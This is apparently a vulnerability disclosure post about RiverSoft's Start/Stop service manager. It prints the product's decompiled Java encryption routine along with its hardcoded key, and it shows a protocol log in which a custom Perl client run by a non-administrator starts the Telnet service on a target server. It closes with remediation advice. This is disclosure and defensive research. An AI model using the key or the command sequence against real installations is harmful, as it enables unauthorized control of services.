Start/Stop RiverSoft vulnerabilities


Research Notes:
--------------
Product: StartStop
Company: Riversoft
Website: www.rivernorthsoftware.com
Know's Company: We sent two E-mail. The company never response
Author: Francisco Amato

Encryptation weakness: 
It uses a very simple code of encryptation with a harcoded key.
The key, and the function to encrypt/decrypt are in the Java Applet client.
sKey = "%$sTa$*(rt@$`ST*!@#oP!!@#"
 
Function to decrypt/encrypt:
----------------------------------------
private String Crypt(String Action, String sSource)
    {
        String sKey = "";
        String sDest = "";
        String sHexTemp = "";
        int lKeyPos = -1;
        if(sKey == "") 
            sKey = "%$sTa$*(rt@$`ST*!@#oP!!@#";
        int lKeyLen = sKey.length();
        if(Action.compareTo("E") == 0)
        {
            int lOffSet = (int)( Math.random() * 255D);
            sDest = Integer.toHexString(lOffSet & 0xff);
            if(sDest.length() < 2)
                sDest = " " + sDest;
            for(int lSrcPos = 0; lSrcPos < sSource.length(); lSrcPos++)
            {
                int lSrcAsc = sSource.charAt(lSrcPos) + lOffSet;
                lSrcAsc %= 255;
                if(lKeyPos < lKeyLen - 1)
                    lKeyPos++; 
                else
                    lKeyPos = 0;
                lSrcAsc ^= sKey.charAt(lKeyPos);
                sHexTemp = Integer.toHexString(lSrcAsc & 0xff);
                if(sHexTemp.length () < 2)
                    sHexTemp = " " + sHexTemp;
                sDest = sDest + sHexTemp;
                lOffSet = lSrcAsc;
            }

        } else
        if(Action.compareTo("D") == 0)


            try
            {
                String sFirst = sSource.substring(0, 2);
                sFirst = sFirst.trim();
                int lOffSet = Integer.parseInt(sFirst, 16);
                for(int lSrcPos = 2; lSrcPos < sSource.length(); lSrcPos += 2)
                {
                    String sTemp = sSource.substring(lSrcPos, lSrcPos + 2);
                    sTemp = sTemp.trim();
                    int lSrcAsc = Integer.parseInt (sTemp, 16);
                    if(lKeyPos < lKeyLen - 1)
                        lKeyPos++;
                    else
                        lKeyPos = 0;
                    int lTmpArcAsc = lSrcAsc ^ sKey.charAt(lKeyPos);
                    if(lTmpArcAsc <= lOffSet)
                        lTmpArcAsc = (255 + lTmpArcAsc) - lOffSet;
                    else
                        lTmpArcAsc -= lOffSet; 
                    String sDestTemp = (new Character((char)lTmpArcAsc)).toString();
                    sDest = sDest + sDestTemp;
                    lOffSet = lSrcAsc;
                }

            }
            catch(Exception _ex)
            {
                sDest = "";
            }
        return sDest;
    }
}

You have to use standars of encryptation. Do you have to know that Java is a lenguage that it very easy to dissambler and get the source code.

Permission weakness: 

It's possible to create a different client to make the connection with the server, and send start/stop/shutdown/restart command without have the permission to make this task, so the client java applet it 's the point to secure the action but it's possible to modify this client or make a new client. 
You have to do the comprobation of permission in the server non in the client.

 

#I check if the services is up  
root@blackhat:~# telnet 192.168.2.2 23
Trying 192.168.2.2... 
telnet: connect to address 192.168.2.2: Connection refused

 

#execute client  
francisco@blackhat:~/start_stop$ perl client.pl

  

(azul : Response of server) 
(rojo : Client information send) 

  

#Helo msg 
r (LOGINACK;A1F7 A333F;) 

  

#Check if we are administrator 
(ISADMIN;1668;)

 

#We aren't administrator 
r (ISADMINACK;N;)

  

#Send command of refresh list of services 
(REFRESH;1668;)

 

# Get list of services that we have permission 
r (REFRESHACK;3;
J Walk Server - EXTRANET| 
J Walk Server - EXTRANET|Running} 
J Walk Server - ILATINA| 
J Walk Server - ILATINA|Running} 
J Walk Server - INTRANET| 
J Walk Server - INTRANET|Running};) 

 

#I send the command start of services Telnet 
(START;1668;Y;TlntSvr;Telnet;)

 

#Command was process 
r (STARTACK;Telnet;)

 

 

#Check the vulnerability 
root@blackhat:~# telnet 192.168.2.2 23
Trying 192.168.2.2...
Connected to 192.168.2.2 .
Escape character is '^]'.

 

Server allows NTLM authentication only 
Server has closed connection
root@blackhat:~# 

Post a Comment
Thanks for your comment